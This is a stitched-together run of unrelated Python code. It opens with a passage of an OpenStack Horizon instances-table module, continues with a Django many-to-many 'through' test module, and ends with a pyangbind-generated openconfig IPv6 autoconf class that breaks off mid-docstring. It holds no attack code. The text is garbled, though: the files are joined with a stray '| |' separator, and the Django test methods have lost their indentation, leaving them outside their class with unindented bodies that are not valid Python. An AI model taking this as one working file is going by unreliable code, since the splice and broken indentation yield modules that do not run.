    classes = ("ajax-modal",)
    policy_rules = (("compute", "compute:attach_volume"),)
    def allowed(self, request, instance=None):
        # Fix: 'in ("ACTIVE")' was a substring test against the string
        # "ACTIVE" (missing comma); use a real one-element tuple.
        return instance.status in ("ACTIVE",) \
            and not is_deleting(instance)
class DetachVolume(AttachVolume):
    """Row action linking to the detach-volume form.

    Only available while the instance is ACTIVE and not being deleted.
    """
    name = "detach_volume"
    verbose_name = _("Detach Volume")
    url = "horizon:project:instances:detach_volume"
    policy_rules = (("compute", "compute:detach_volume"),)
    def allowed(self, request, instance=None):
        # Fix: 'in ("ACTIVE")' was a substring test against the string
        # "ACTIVE" (missing comma); use a real one-element tuple.
        return instance.status in ("ACTIVE",) \
            and not is_deleting(instance)
class AttachInterface(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the attach-interface form (Neutron ports)."""
    name = "attach_interface"
    verbose_name = _("Attach Interface")
    classes = ("btn-confirm", "ajax-modal")
    url = "horizon:project:instances:attach_interface"
    policy_rules = (("compute", "compute_extension:attach_interfaces"),)
    def allowed(self, request, instance):
        # Requires a usable instance state and the network service.
        return ((instance.status in ACTIVE_STATES
                 or instance.status == 'SHUTOFF')
                and not is_deleting(instance)
                and api.base.is_service_enabled(request, 'network'))
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        return urlresolvers.reverse(self.url, args=[instance_id])
# TODO(lyj): the policy for detach interface not exists in nova.json,
# once it's added, it should be added here.
class DetachInterface(policy.PolicyTargetMixin, tables.LinkAction):
    """Row action linking to the detach-interface form."""
    name = "detach_interface"
    verbose_name = _("Detach Interface")
    classes = ("btn-confirm", "ajax-modal")
    url = "horizon:project:instances:detach_interface"
    def allowed(self, request, instance):
        if not api.base.is_service_enabled(request, 'network'):
            return False
        if is_deleting(instance):
            return False
        if (instance.status not in ACTIVE_STATES and
                instance.status != 'SHUTOFF'):
            return False
        # Only offered when at least one fixed address (i.e. an attached
        # port) exists to detach.
        for addresses in instance.addresses.values():
            for address in addresses:
                if address.get('OS-EXT-IPS:type') == "fixed":
                    return True
        return False
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        return urlresolvers.reverse(self.url, args=[instance_id])
def get_ips(instance):
    """Render the instance's addresses as HTML, grouped by network and
    split into floating vs. non-floating IPs.
    """
    ip_groups = {}
    for network, addresses in six.iteritems(instance.addresses):
        grouped = {"floating": [], "non_floating": []}
        for address in addresses:
            is_floating = ('OS-EXT-IPS:type' in address and
                           address['OS-EXT-IPS:type'] == "floating")
            bucket = "floating" if is_floating else "non_floating"
            grouped[bucket].append(address)
        ip_groups[network] = grouped
    return template.loader.render_to_string(
        'project/instances/_instance_ips.html', {"ip_groups": ip_groups})
def get_size(instance):
    """Render the instance's flavor (name, vcpus, RAM, disk) as HTML,
    or a translated "Not available" when the flavor lookup failed
    (i.e. full_flavor was never attached by UpdateRow).
    """
    if not hasattr(instance, "full_flavor"):
        return _("Not available")
    flavor = instance.full_flavor
    if flavor.disk > 0:
        size_disk = sizeformat.diskgbformat(flavor.disk)
    else:
        size_disk = _("%s GB") % "0"
    context = {
        "name": flavor.name,
        "id": instance.id,
        "size_disk": size_disk,
        "size_ram": sizeformat.mb_float_format(flavor.ram),
        "vcpus": flavor.vcpus,
        "flavor_id": flavor.id
    }
    return template.loader.render_to_string(
        'project/instances/_instance_flavor.html', context)
def get_keyname(instance):
    """Return the instance's keypair name (which may be None), or a
    translated "Not available" when the instance carries no key_name
    attribute at all.
    """
    if not hasattr(instance, "key_name"):
        return _("Not available")
    return instance.key_name
def get_power_state(instance):
    """Translate the nova power-state code stored on the instance to its
    display name, defaulting to '' for unknown codes.
    """
    state_code = getattr(instance, "OS-EXT-STS:power_state", 0)
    return POWER_STATES.get(state_code, '')
# Human-readable display names for instance statuses; keys are the
# lower-cased status / vm_state values returned by nova.
STATUS_DISPLAY_CHOICES = (
    ("deleted", pgettext_lazy("Current status of an Instance", u"Deleted")),
    ("active", pgettext_lazy("Current status of an Instance", u"Active")),
    ("shutoff", pgettext_lazy("Current status of an Instance", u"Shutoff")),
    ("suspended", pgettext_lazy("Current status of an Instance",
                                u"Suspended")),
    ("paused", pgettext_lazy("Current status of an Instance", u"Paused")),
    ("error", pgettext_lazy("Current status of an Instance", u"Error")),
    ("resize", pgettext_lazy("Current status of an Instance",
                             u"Resize/Migrate")),
    ("verify_resize", pgettext_lazy("Current status of an Instance",
                                    u"Confirm or Revert Resize/Migrate")),
    ("revert_resize", pgettext_lazy(
        "Current status of an Instance", u"Revert Resize/Migrate")),
    ("reboot", pgettext_lazy("Current status of an Instance", u"Reboot")),
    ("hard_reboot", pgettext_lazy("Current status of an Instance",
                                  u"Hard Reboot")),
    ("password", pgettext_lazy("Current status of an Instance", u"Password")),
    ("rebuild", pgettext_lazy("Current status of an Instance", u"Rebuild")),
    ("migrating", pgettext_lazy("Current status of an Instance",
                                u"Migrating")),
    ("build", pgettext_lazy("Current status of an Instance", u"Build")),
    ("rescue", pgettext_lazy("Current status of an Instance", u"Rescue")),
    ("soft-delete", pgettext_lazy("Current status of an Instance",
                                  u"Soft Deleted")),
    ("shelved", pgettext_lazy("Current status of an Instance", u"Shelved")),
    ("shelved_offloaded", pgettext_lazy("Current status of an Instance",
                                        u"Shelved Offloaded")),
    # these vm states are used when generating CSV usage summary
    ("building", pgettext_lazy("Current status of an Instance", u"Building")),
    ("stopped", pgettext_lazy("Current status of an Instance", u"Stopped")),
    ("rescued", pgettext_lazy("Current status of an Instance", u"Rescued")),
    ("resized", pgettext_lazy("Current status of an Instance", u"Resized")),
)
# Display value used when an instance has no task in progress.
TASK_DISPLAY_NONE = pgettext_lazy("Task status of an Instance", u"None")
# Mapping of task states taken from Nova's nova/compute/task_states.py
TASK_DISPLAY_CHOICES = (
    ("scheduling", pgettext_lazy("Task status of an Instance",
                                 u"Scheduling")),
    ("block_device_mapping", pgettext_lazy("Task status of an Instance",
                                           u"Block Device Mapping")),
    ("networking", pgettext_lazy("Task status of an Instance",
                                 u"Networking")),
    ("spawning", pgettext_lazy("Task status of an Instance", u"Spawning")),
    ("image_snapshot", pgettext_lazy("Task status of an Instance",
                                     u"Snapshotting")),
    ("image_snapshot_pending", pgettext_lazy("Task status of an Instance",
                                             u"Image Snapshot Pending")),
    ("image_pending_upload", pgettext_lazy("Task status of an Instance",
                                           u"Image Pending Upload")),
    ("image_uploading", pgettext_lazy("Task status of an Instance",
                                      u"Image Uploading")),
    ("image_backup", pgettext_lazy("Task status of an Instance",
                                   u"Image Backup")),
    ("updating_password", pgettext_lazy("Task status of an Instance",
                                        u"Updating Password")),
    ("resize_prep", pgettext_lazy("Task status of an Instance",
                                  u"Preparing Resize or Migrate")),
    ("resize_migrating", pgettext_lazy("Task status of an Instance",
                                       u"Resizing or Migrating")),
    ("resize_migrated", pgettext_lazy("Task status of an Instance",
                                      u"Resized or Migrated")),
    ("resize_finish", pgettext_lazy("Task status of an Instance",
                                    u"Finishing Resize or Migrate")),
    ("resize_reverting", pgettext_lazy("Task status of an Instance",
                                       u"Reverting Resize or Migrate")),
    ("resize_confirming", pgettext_lazy("Task status of an Instance",
                                        u"Confirming Resize or Migrate")),
    ("rebooting", pgettext_lazy("Task status of an Instance", u"Rebooting")),
    ("reboot_pending", pgettext_lazy("Task status of an Instance",
                                     u"Reboot Pending")),
    ("reboot_started", pgettext_lazy("Task status of an Instance",
                                     u"Reboot Started")),
    ("rebooting_hard", pgettext_lazy("Task status of an Instance",
                                     u"Hard Rebooting")),
    ("reboot_pending_hard", pgettext_lazy("Task status of an Instance",
                                          u"Hard Reboot Pending")),
    ("reboot_started_hard", pgettext_lazy("Task status of an Instance",
                                          u"Hard Reboot Started")),
    ("pausing", pgettext_lazy("Task status of an Instance", u"Pausing")),
    ("unpausing", pgettext_lazy("Task status of an Instance", u"Resuming")),
    ("suspending", pgettext_lazy("Task status of an Instance",
                                 u"Suspending")),
    ("resuming", pgettext_lazy("Task status of an Instance", u"Resuming")),
    ("powering-off", pgettext_lazy("Task status of an Instance",
                                   u"Powering Off")),
    ("powering-on", pgettext_lazy("Task status of an Instance",
                                  u"Powering On")),
    ("rescuing", pgettext_lazy("Task status of an Instance", u"Rescuing")),
    ("unrescuing", pgettext_lazy("Task status of an Instance",
                                 u"Unrescuing")),
    ("rebuilding", pgettext_lazy("Task status of an Instance",
                                 u"Rebuilding")),
    ("rebuild_block_device_mapping", pgettext_lazy(
        "Task status of an Instance", u"Rebuild Block Device Mapping")),
    ("rebuild_spawning", pgettext_lazy("Task status of an Instance",
                                       u"Rebuild Spawning")),
    ("migrating", pgettext_lazy("Task status of an Instance", u"Migrating")),
    ("deleting", pgettext_lazy("Task status of an Instance", u"Deleting")),
    ("soft-deleting", pgettext_lazy("Task status of an Instance",
                                    u"Soft Deleting")),
    ("restoring", pgettext_lazy("Task status of an Instance", u"Restoring")),
    ("shelving", pgettext_lazy("Task status of an Instance", u"Shelving")),
    ("shelving_image_pending_upload", pgettext_lazy(
        "Task status of an Instance", u"Shelving Image Pending Upload")),
    ("shelving_image_uploading", pgettext_lazy("Task status of an Instance",
                                               u"Shelving Image Uploading")),
    ("shelving_offloading", pgettext_lazy("Task status of an Instance",
                                          u"Shelving Offloading")),
    ("unshelving", pgettext_lazy("Task status of an Instance",
                                 u"Unshelving")),
)
# Human-readable display names for the power states produced by
# get_power_state (keys match the POWER_STATES values).
POWER_DISPLAY_CHOICES = (
    ("NO STATE", pgettext_lazy("Power state of an Instance", u"No State")),
    ("RUNNING", pgettext_lazy("Power state of an Instance", u"Running")),
    ("BLOCKED", pgettext_lazy("Power state of an Instance", u"Blocked")),
    ("PAUSED", pgettext_lazy("Power state of an Instance", u"Paused")),
    ("SHUTDOWN", pgettext_lazy("Power state of an Instance", u"Shut Down")),
    ("SHUTOFF", pgettext_lazy("Power state of an Instance", u"Shut Off")),
    ("CRASHED", pgettext_lazy("Power state of an Instance", u"Crashed")),
    ("SUSPENDED", pgettext_lazy("Power state of an Instance", u"Suspended")),
    ("FAILED", pgettext_lazy("Power state of an Instance", u"Failed")),
    ("BUILDING", pgettext_lazy("Power state of an Instance", u"Building")),
)
# Server-side filter fields for the instances table: (query field,
# display label, server-side flag[, help text]).
INSTANCE_FILTER_CHOICES = (
    ('uuid', _("Instance ID ="), True),
    ('name', _("Instance Name"), True),
    ('image', _("Image ID ="), True),
    ('image_name', _("Image Name ="), True),
    ('ip', _("IPv4 Address"), True),
    ('ip6', _("IPv6 Address"), True),
    ('flavor', _("Flavor ID ="), True),
    ('flavor_name', _("Flavor Name ="), True),
    ('key_name', _("Key Pair Name"), True),
    ('status', _("Status ="), True),
    ('availability_zone', _("Availability Zone"), True),
    # Fix: the date/time standard is ISO 8601 (was misspelled "8061").
    ('changes-since', _("Changes Since"), True,
     _("Filter by an ISO 8601 formatted time, e.g. 2016-06-14T06:27:59Z")),
    ('vcpus', _("vCPUs ="), True),
)
class InstancesFilterAction(tables.FilterAction):
    """Server-side filter for the instances table, using the field
    choices defined in INSTANCE_FILTER_CHOICES.
    """
    filter_type = "server"
    filter_choices = INSTANCE_FILTER_CHOICES
class InstancesTable(tables.DataTable):
    """The project-level instances table: columns, status polling rules,
    and the full set of table/row actions.
    """
    # Task states considered "settled" (no AJAX polling needed).
    TASK_STATUS_CHOICES = (
        (None, True),
        ("none", True)
    )
    # Instance statuses considered settled; False marks a terminal
    # error state.
    STATUS_CHOICES = (
        ("active", True),
        ("shutoff", True),
        ("suspended", True),
        ("paused", True),
        ("error", False),
        ("rescue", True),
        ("shelved", True),
        ("shelved_offloaded", True),
    )
    name = tables.WrappingColumn("name",
                                 link="horizon:project:instances:detail",
                                 verbose_name=_("Instance Name"))
    image_name = tables.Column("image_name",
                               verbose_name=_("Image Name"))
    ip = tables.Column(get_ips,
                       verbose_name=_("IP Address"),
                       attrs={'data-type': "ip"})
    size = tables.Column(get_size, sortable=False, verbose_name=_("Size"))
    keypair = tables.Column(get_keyname, verbose_name=_("Key Pair"))
    status = tables.Column("status",
                           filters=(title, filters.replace_underscores),
                           verbose_name=_("Status"),
                           status=True,
                           status_choices=STATUS_CHOICES,
                           display_choices=STATUS_DISPLAY_CHOICES)
    az = tables.Column("availability_zone",
                       verbose_name=_("Availability Zone"))
    task = tables.Column("OS-EXT-STS:task_state",
                         verbose_name=_("Task"),
                         empty_value=TASK_DISPLAY_NONE,
                         status=True,
                         status_choices=TASK_STATUS_CHOICES,
                         display_choices=TASK_DISPLAY_CHOICES)
    state = tables.Column(get_power_state,
                          filters=(title, filters.replace_underscores),
                          verbose_name=_("Power State"),
                          display_choices=POWER_DISPLAY_CHOICES)
    created = tables.Column("created",
                            verbose_name=_("Time since created"),
                            filters=(filters.parse_isotime,
                                     filters.timesince_sortable),
                            attrs={'data-type': 'timesince'})
    class Meta(object):
        name = "instances"
        verbose_name = _("Instances")
        # Poll rows until both status and task columns are settled.
        status_columns = ["status", "task"]
        row_class = UpdateRow
        table_actions_menu = (StartInstance, StopInstance, SoftRebootInstance)
        # Which launch button(s) appear depends on deployment settings:
        # the legacy Django workflow and/or the Angular (NG) wizard.
        launch_actions = ()
        if getattr(settings, 'LAUNCH_INSTANCE_LEGACY_ENABLED', False):
            launch_actions = (LaunchLink,) + launch_actions
        if getattr(settings, 'LAUNCH_INSTANCE_NG_ENABLED', True):
            launch_actions = (LaunchLinkNG,) + launch_actions
        table_actions = launch_actions + (DeleteInstance,
                                          InstancesFilterAction)
        row_actions = (StartInstance, ConfirmResize, RevertResize,
                       CreateSnapshot, SimpleAssociateIP, AssociateIP,
                       SimpleDisassociateIP, AttachInterface,
                       DetachInterface, EditInstance, AttachVolume,
                       DetachVolume, UpdateMetadata, DecryptInstancePassword,
                       EditInstanceSecurityGroups, ConsoleLink, LogLink,
                       TogglePause, ToggleSuspend, ToggleShelve,
                       ResizeLink, LockInstance, UnlockInstance,
                       SoftRebootInstance, RebootInstance,
                       StopInstance, RebuildInstance, DeleteInstance)
# ---- NOTE(review): concatenation artifact removed; an unrelated module
# (Django m2m_through regression tests) follows below. ----
from __future__ import unicode_literals
from datetime import datetime
from operator import attrgetter
from django.test import TestCase
from .models import (Person, Group, Membership, CustomMembership,
PersonSelfRefM2M, Friendship)
class M2mThroughTests(TestCase):
    def setUp(self):
        # Shared fixture: three people and two groups used by the tests.
        self.bob = Person.objects.create(name='Bob')
        self.jim = Person.objects.create(name='Jim')
        self.jane = Person.objects.create(name='Jane')
        self.rock = Group.objects.create(name='Rock')
        self.roll = Group.objects.create(name='Roll')
def test_m2m_through(self):
# We start out by making sure that the Group 'rock' has no members.
self.assertQuerysetEqual(
self.rock.members.all(),
[]
)
# To make Jim a member of Group Rock, simply create a Membership object.
m1 = Membership.objects.create(person=self.jim, group=self.rock)
# We can do the same for Jane and Rock.
m2 = Membership.objects.create(person=self.jane, group=self.rock)
# Let's check to make sure that it worked. Jane and Jim should be members of Rock.
self.assertQuerysetEqual(
self.rock.members.all(), [
'Jane',
'Jim'
],
attrgetter("name")
)
# Now we can add a bunch more Membership objects to test with.
m3 = Membership.objects.create(person=self.bob, group=self.roll)
m4 = Membership.objects.create(person=self.jim, group=self.roll)
m5 = Membership.objects.create(person=self.jane, group=self.roll)
# We can get Jim's Group membership as with any ForeignKey.
self.assertQuerysetEqual(
self.jim.group_set.all(), [
'Rock',
'Roll'
],
attrgetter("name")
)
# Querying the intermediary model works like normal.
self.assertEqual(
repr(Membership.objects.get(person=self.jane, group=self.rock)),
'<Membership: Jane is a member of Rock>'
)
# It's not only get that works. Filter works like normal as well.
self.assertQuerysetEqual(
Membership.objects.filter(person=self.jim), [
'<Membership: Jim is a member of Rock>',
'<Membership: Jim is a member of Roll>'
]
)
self.rock.members.clear()
# Now there will be no members of Rock.
self.assertQuerysetEqual(
self.rock.members.all(),
[]
)
def test_forward_descriptors(self):
# Due to complications with adding via an intermediary model,
# the add method is not provided.
self.assertRaises(AttributeError, lambda: self.rock.members.add(self.bob))
# Create is also disabled as it suffers from the same problems as add.
self.assertRaises(AttributeError, lambda: self.rock.members.create(name='Anne'))
# Remove has similar complications, and is not provided either.
self.assertRaises(AttributeError, lambda: self.rock.members.remove(self.jim))
m1 = Membership.objects.create(person=self.jim, group=self.rock)
m2 = Membership.objects.create(person=self.jane, group=self.rock)
# Here we back up the list of all members of Rock.
backup = list(self.rock.members.all())
# ...and we verify that it has worked.
self.assertEqual(
[p.name for p in backup],
['Jane', 'Jim']
)
# The clear function should still work.
self.rock.members.clear()
# Now there will be no members of Rock.
self.assertQuerysetEqual(
self.rock.members.all(),
[]
)
# Assignment should not work with models specifying a through model for many of
# the same reasons as adding.
self.assertRaises(AttributeError, setattr, self.rock, "members", backup)
# Let's re-save those instances that we've cleared.
m1.save()
m2.save()
# Verifying that those instances were re-saved successfully.
self.assertQuerysetEqual(
self.rock.members.all(),[
'Jane',
'Jim'
],
attrgetter("name")
)
def test_reverse_descriptors(self):
# Due to complications with adding via an intermediary model,
# the add method is not provided.
self.assertRaises(AttributeError, lambda: self.bob.group_set.add(self.rock))
# Create is also disabled as it suffers from the same problems as add.
self.assertRaises(AttributeError, lambda: self.bob.group_set.create(name="funk"))
# Remove has similar complications, and is not provided either.
self.assertRaises(AttributeError, lambda: self.jim.group_set.remove(self.rock))
m1 = Membership.objects.create(person=self.jim, group=self.rock)
m2 = Membership.objects.create(person=self.jim, group=self.roll)
# Here we back up the list of all of Jim's groups.
backup = list(self.jim.group_set.all())
self.assertEqual(
[g.name for g in backup],
['Rock', 'Roll']
)
# The clear function should still work.
self.jim.group_set.clear()
# Now Jim will be in no groups.
self.assertQuerysetEqual(
self.jim.group_set.all(),
[]
)
# Assignment should not work with models specifying a through model for many of
# the same reasons as adding.
self.assertRaises(AttributeError, setattr, self.jim, "group_set", backup)
# Let's re-save those instances that we've cleared.
m1.save()
m2.save()
# Verifying that those instances were re-saved successfully.
self.assertQuerysetEqual(
self.jim.group_set.all(),[
'Rock',
'Roll'
],
attrgetter("name")
)
def test_custom_tests(self):
# Let's see if we can query through our second relationship.
self.assertQuerysetEqual(
self.rock.custom_members.all(),
[]
)
# We can query in the opposite direction as well.
self.assertQuerysetEqual(
self.bob.custom.all(),
[]
)
cm1 = CustomMembership.objects.create(person=self.bob, group=self.rock)
cm2 = CustomMembership.objects.create(person=self.jim, group=self.rock)
# If we get the number of people in Rock, it should be both Bob and Jim.
self.assertQuerysetEqual(
self.rock.custom_members.all(),[
'Bob',
'Jim'
],
attrgetter("name")
)
# Bob should only be in one custom group.
self.assertQuerysetEqual(
self.bob.custom.all(),[
'Rock'
],
attrgetter("name")
)
# Let's make sure our new descriptors don't conflict with the FK related_name.
self.assertQuerysetEqual(
self.bob.custom_person_related_name.all(),[
'<CustomMembership: Bob is a member of Rock>'
]
)
def test_self_referential_tests(self):
# Let's first create a person who has no friends.
tony = PersonSelfRefM2M.objects.create(name="Tony")
self.assertQuerysetEqual(
tony.friends.all(),
[]
)
chris = PersonSelfRefM2M.objects.create(name="Chris")
f = Friendship.objects.create(first=tony, second=chris, date_friended=datetime.now())
# Tony should now show that Chris is his friend.
self.assertQuerysetEqual(
tony.friends.all(),[
'Chris'
],
attrgetter("name")
)
# But we haven't established that Chris is Tony's Friend.
self.assertQuerysetEqual(
chris.friends.all(),
[]
)
f2 = Friendship.objects.create(first=chris, second=tony, date_friended=datetime.now())
# Having added Chris as a friend, let's make sure that his friend set reflects
# that addition.
self.assertQuerysetEqual(
chris.friends.all(),[
'Tony'
],
attrgetter("name")
)
# Chris gets mad and wants to get rid of all of his friends.
chris.friends.clear()
# Now he should not have any more friends.
self.assertQuerysetEqual(
chris.friends.all(),
[]
)
# Since this isn't a symmetrical relation, Tony's friend link still exists.
self.assertQuerysetEqual(
tony.friends.all(),[
'Chris'
],
attrgetter("name")
)
def test_query_tests(self):
m1 = Membership.objects.create(person=self.jim, group=self.rock)
m2 = Membership.objects.create(person=self.jane, group=self.rock)
m3 = Membership.objects.create(person=self.bob, group=self.roll)
m4 = Membership.objects.create(person=self.jim, group=self.roll)
m5 = Membership.objects.create(person=self.jane, group=self.roll)
m2.invite_reason = "She was just awesome."
m2.date_joined = datetime(2006, 1, 1)
m2.save()
m3.date_joined = datetime(2004, 1, 1)
m3.save()
m5.date_joined = datetime(2004, 1, 1)
m5.save()
# We can query for the related model by using its attribute name (members, in
# this case).
self.assertQuerysetEqual(
Group.objects.filter(members__name='Bob'),[
'Roll'
],
attrgetter("name")
)
# To query through the intermediary model, we specify its model name.
# In this case, membership.
self.assertQuerysetEqual(
Group.objects.filter(membership__invite_reason="She was just awesome."),[
'Rock'
],
attrgetter("name")
)
# If we want to query in the reverse direction by the related model, use its
# model name (group, in this case).
self.assertQuerysetEqual(
Person.objects.filter(group__name="Rock"),[
'Jane',
'Jim'
],
attrgetter("name")
)
cm1 = CustomMembership.objects.create(person=self.bob, group=self.rock)
cm2 = CustomMembership.objects.create(person=self.jim, group=self.rock)
# If the m2m field has specified a related_name, using that will work.
self.assertQuerysetEqual(
Person.objects.filter(custom__name="Rock"),[
'Bob',
'Jim'
],
attrgetter("name")
)
# To query through the intermediary model in the reverse direction, we again
# specify its model name (membership, in this case).
self.assertQuerysetEqual(
Person.objects.filter(membership__invite_reason="She was just awesome."),[
'Jane'
],
attrgetter("name")
)
# Let's see all of the groups that Jane joined after 1 Jan 2005:
self.assertQuerysetEqual(
Group.objects.filter(membership__date_joined__gt=datetime(2005, 1, 1), membership__person=self.jane),[
'Rock'
],
attrgetter("name")
)
# Queries also work in the reverse direction: Now let's see all of the people
# that have joined Rock since 1 Jan 2005:
self.assertQuerysetEqual(
Person.objects.filter(membership__date_joined__gt=datetime(2005, 1, 1), membership__group=self.rock),[
'Jane',
'Jim'
],
attrgetter("name")
)
# Conceivably, queries through membership could return correct, but non-unique
# querysets. To demonstrate this, we query for all people who have joined a
# group after 2004:
self.assertQuerysetEqual(
Person.objects.filter(membership__date_joined__gt=datetime(2004, 1, 1)),[
'Jane',
'Jim',
'Jim'
],
attrgetter("name")
)
# Jim showed up twice, because he joined two groups ('Rock', and 'Roll'):
self.assertEqual(
[(m.person.name, m.group.name) for m in Membership.objects.filter(date_joined__gt=datetime(2004, 1, 1))],
[('Jane', 'Rock'), ('Jim', 'Rock'), ('Jim', 'Roll')]
)
# QuerySet's distinct() method can correct this problem.
self.assertQuerysetEqual(
Person.objects.filter(membership__date_joined__gt=datetime(2004, 1, 1)).distinct(),[
'Jane',
'Jim'
],
attrgetter("name")
)
| |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# Python 2/3 compatibility: alias the Python 2 ``__builtin__`` module and the
# ``long`` integer type so the generated code below runs on both majors.
if six.PY3:
    import builtins as __builtin__
    long = int
elif six.PY2:
    import __builtin__
class state(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-interfaces - based on the path /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: Operational state data

    NOTE(review): the originally generated code repeated each leaf's full
    YANGDynClass specification three times (in ``__init__``, ``_set_*`` and
    ``_unset_*``).  The shared metadata has been factored into the private
    ``_make_*_leaf`` helpers below; the public interface is unchanged.
    """
    __slots__ = (
        "_path_helper",
        "_extmethods",
        "__create_global_addresses",
        "__create_temporary_addresses",
        "__temporary_valid_lifetime",
        "__temporary_preferred_lifetime",
    )
    _yang_name = "state"
    _pybind_generated_by = "container"

    @staticmethod
    def _uint32_type():
        """Return the restricted integer class used for uint32 leaves."""
        return RestrictedClassType(
            base_type=long,
            restriction_dict={"range": ["0..4294967295"]},
            int_size=32,
        )

    def _leaf_kwargs(self, yang_name, yang_type):
        """Return the YANGDynClass kwargs shared by every leaf of this
        container (all leaves are operational state, hence is_config=False)."""
        return dict(
            is_leaf=True,
            yang_name=yang_name,
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/interfaces/ip-ext",
            defining_module="openconfig-if-ip-ext",
            yang_type="%s" % yang_type,
            is_config=False,
        )

    def _make_bool_leaf(self, yang_name, default, *value):
        """Build a boolean leaf; ``*value`` optionally carries the value being
        set (as the first positional argument to YANGDynClass)."""
        kwargs = self._leaf_kwargs(yang_name, "boolean")
        kwargs.update(base=YANGBool, default=YANGBool(default))
        return YANGDynClass(*value, **kwargs)

    def _make_uint32_leaf(self, yang_name, default, *value):
        """Build a uint32 leaf; ``*value`` optionally carries the value being
        set (as the first positional argument to YANGDynClass)."""
        uint32 = self._uint32_type()
        kwargs = self._leaf_kwargs(yang_name, "uint32")
        kwargs.update(base=uint32, default=uint32(default))
        return YANGDynClass(*value, **kwargs)

    def __init__(self, *args, **kwargs):
        self._path_helper = False
        self._extmethods = False
        # Defaults per openconfig-if-ip-ext: global addresses on, temporary
        # addresses off, 7-day valid / 1-day preferred lifetimes.
        self.__create_global_addresses = self._make_bool_leaf(
            "create-global-addresses", "true")
        self.__create_temporary_addresses = self._make_bool_leaf(
            "create-temporary-addresses", "false")
        self.__temporary_valid_lifetime = self._make_uint32_leaf(
            "temporary-valid-lifetime", 604800)
        self.__temporary_preferred_lifetime = self._make_uint32_leaf(
            "temporary-preferred-lifetime", 86400)
        load = kwargs.pop("load", None)
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            # Copy-construct from an object exposing the same elements.
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Fall back to the static schema path when detached from a parent.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "interfaces",
                "interface",
                "subinterfaces",
                "subinterface",
                "ipv6",
                "autoconf",
                "state",
            ]

    def _get_create_global_addresses(self):
        """
        Getter method for create_global_addresses, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/create_global_addresses (boolean)

        YANG Description: [adapted from IETF IP model RFC 7277]

If enabled, the host creates global addresses as
described in RFC 4862.
        """
        return self.__create_global_addresses

    def _set_create_global_addresses(self, v, load=False):
        """
        Setter method for create_global_addresses, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/create_global_addresses (boolean)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_create_global_addresses is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_create_global_addresses() directly.

        YANG Description: [adapted from IETF IP model RFC 7277]

If enabled, the host creates global addresses as
described in RFC 4862.
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = self._make_bool_leaf("create-global-addresses", "true", v)
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """create_global_addresses must be of a type compatible with boolean""",
                    "defined-type": "boolean",
                    "generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("true"), is_leaf=True, yang_name="create-global-addresses", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip-ext', defining_module='openconfig-if-ip-ext', yang_type='boolean', is_config=False)""",
                }
            )
        self.__create_global_addresses = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_create_global_addresses(self):
        self.__create_global_addresses = self._make_bool_leaf(
            "create-global-addresses", "true")

    def _get_create_temporary_addresses(self):
        """
        Getter method for create_temporary_addresses, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/create_temporary_addresses (boolean)

        YANG Description: [adapted from IETF IP model RFC 7277]

If enabled, the host creates temporary addresses as
described in RFC 4941.
        """
        return self.__create_temporary_addresses

    def _set_create_temporary_addresses(self, v, load=False):
        """
        Setter method for create_temporary_addresses, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv6/autoconf/state/create_temporary_addresses (boolean)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_create_temporary_addresses is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_create_temporary_addresses() directly.

        YANG Description: [adapted from IETF IP model RFC 7277]

If enabled, the host creates temporary addresses as
described in RFC 4941.
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = self._make_bool_leaf("create-temporary-addresses", "false", v)
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """create_temporary_addresses must be of a type compatible with boolean""",
                    "defined-type": "boolean",
                    "generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="create-temporary-addresses", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip-ext', defining_module='openconfig-if-ip-ext', yang_type='boolean', is_config=False)""",
                }
            )
        self.__create_temporary_addresses = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_create_temporary_addresses(self):
        self.__create_temporary_addresses = self._make_bool_leaf(
            "create-temporary-addresses", "false")

    def _get_temporary_valid_lifetime(self):
        """
